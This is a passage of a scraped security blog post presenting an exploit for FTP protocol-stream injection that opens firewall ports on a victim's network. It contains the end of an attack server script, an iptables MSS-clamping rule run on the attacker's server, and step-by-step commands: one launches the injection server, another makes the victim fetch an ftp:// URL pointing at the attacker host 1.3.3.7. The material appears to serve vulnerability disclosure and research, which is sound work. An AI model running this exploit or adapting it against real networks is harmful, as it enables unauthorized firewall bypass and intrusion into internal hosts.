class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;First try to give the vulnerable host this URL:&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-116\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">generateURL<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-117\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-118\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-119\"><span class=\"crayon-v\">threads<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-120\"><span class=\"crayon-v\">listenSock<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-121\"><span class=\"crayon-v\">listenSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">SOL_SOCKET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">SO_REUSEADDR<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-122\"><span class=\"crayon-v\">listenSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">options<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">options<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-123\"><span class=\"crayon-v\">listenSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">listen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">100<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-124\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-125\"><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-126\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-127\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-128\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">clientAddr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">listenSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">accept<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-129\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Connection received from %s:%s.n&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">clientAddr<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-130\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">IPPROTO_TCP<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">TCP_NODELAY<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-131\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">IPPROTO_TCP<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">TCP_WINDOW_CLAMP<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-132\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-133\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">except <\/span><span class=\"crayon-e\">Exception <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-134\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Exception while listening: &#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-135\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">traceback<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">print_exc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-136\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">continue<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-137\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">except <\/span><span class=\"crayon-e\">KeyboardInterrupt <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-138\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">QUIT<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-139\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">break<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-140\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-141\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">now<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">time<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-142\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">clientSrcPort<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">clientAddr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-143\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">stream_id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;%d.%d&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">now<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">clientSrcPort<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-144\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-145\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">threading<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Thread<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">ftpSession<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-146\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">args<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">clientSock<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stream_id<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-147\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">threads<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">append<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-148\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-149\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-150\"><span class=\"crayon-e\">except <\/span><span class=\"crayon-e\">Exception <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-151\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Unexpected exception: %sn&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">repr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-152\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-153\"><span class=\"crayon-v\">listenSock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-154\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-155\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-156\"><span class=\"crayon-v\">QUIT<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-157\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">threads<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-158\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">join<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce4485be518342985-159\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485be518342985-160\"><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0163 seconds] -->  <\/p>\n<p>Next, the following firewall rule should be added to implement the <em>MSS<\/em> clamping (to be clear: we&#8217;re running this on the attacker&#8217;s server, not the victim firewall):<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce4485c4996034737\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  iptables -A OUTPUT -p tcp &#8211;tcp-flags SYN,RST SYN &#8211;sport 21            -j TCPMSS &#8211;set-mss 536<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485c4996034737-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce4485c4996034737-2\">2<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce4485c4996034737-1\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iptables<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">A<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">OUTPUT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tcp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-v\">tcp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">flags <\/span><span class=\"crayon-v\">SYN<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">RST <\/span><span class=\"crayon-v\">SYN<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-i\">sport<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\"><\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce4485c4996034737-2\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">j<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">TCPMSS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">mss<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">536<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<p><u>Step 0: Determine the Victim&#8217;s Internal IP<\/u><\/p>\n<p>Run the <em>ftp-injection-server.py<\/em> script on a high port:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce4485c6781003863\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> .\/ftp-injection-server.py &#8211;port 9999 1.3.3.7 255.255.255.255 1111<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485c6781003863-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce4485c6781003863-1\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ftp<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">injection<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">py<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">9999<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1.3.3.7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">255.255.255.255<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1111<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>Next, run <em>fetch<\/em> on the Victim Target (VT) with a URL that points to this high port service:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce4485c8138157623\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> java fetch ftp:\/\/x:y@1.3.3.7:9999\/foo.txt<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce4485c8138157623-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce4485c8138157623-1\"><span class=\"crayon-e\">java <\/span><span class=\"crayon-e\">fetch <\/span><span class=\"crayon-v\">ftp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/x:y@1.3.3.7:9999\/foo.txt<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- 